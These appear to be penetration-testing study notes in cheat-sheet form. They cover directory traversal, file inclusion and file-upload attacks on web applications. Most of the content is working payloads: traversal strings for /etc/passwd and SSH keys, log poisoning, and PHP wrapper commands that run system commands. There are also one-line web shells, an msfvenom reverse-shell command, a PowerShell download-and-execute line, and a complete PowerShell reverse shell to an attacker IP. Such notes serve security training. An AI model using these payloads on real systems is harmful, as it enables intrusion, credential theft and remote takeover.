Directory Traversal Enumerate Users ../../../../../../../../../../../../../etc/passwd Read SSH Private Keys ../../../../../../../../../../../../../home/offsec/.ssh/id_rsa ProtectionEvasionRemoval of path traversal characters: ../1. Use ..../////, which becomes ../ after sanitization2. URL encodeApproved pathGo to the approved path, then go backAppend extension in the backend File Inclusion Local File Inclusion (LFI) Identity a local file on the server where we can add source code to it (e.g. web application log file) Insert payload code into the local file (log poisoning) Exploit local file inclusion vulnerability to execute that file Log path of Linux: ../../../../../../../../../var/log/apache2/access.log Log path of Windows (XAMPP): C:\xampp\apache\logs\access.log Use of PHP Wrapper php://filter The php://filter wrapper makes the application to include the contents of the file only without execution. curl http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php data:// The data:// wrapper makes the application to intepret the included contents as source code. curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>" echo -n '<?php echo system($_GET["cmd"]);?>' | base64 curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls" Remote File Inclusion (RFI) Host a web server on the attacker machine to serve the remote file to be inluded Make a request to the target web application to connect to the…
File Upload Vulnerability
Web Shell Upload Web Shell Check the programming language of the web app: enumerating common index page extensions, Wappalyzer Write a basic web shell payload in that programming language to check if there is any validation, for example: <?php file_get_contents('/etc/passwd'); ?> <?php system('hostname'); ?> <?php system($_REQUEST['cmd']); ?> <% eval request('cmd') %> Tools for opening a web shell: phpbash, SecLists (PHP), Antak Webshell (ASPX) Reverse Web Shell Main idea: use web shell to initiate a remote session from the target machine to the pentester's machine, thus enable interactive terminal to the target machine. Tools for opening a reverse web shell: php-reverse-shell Generate a reverse shell with msfvenom: msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php Reverse shell for Windows: Powershell command to execute remote script: powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.173/ps.ps1')" Contents of backdoor.ps1: $client = New-Object System.Net.Sockets.TCPClient('192.168.45.173',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() Command…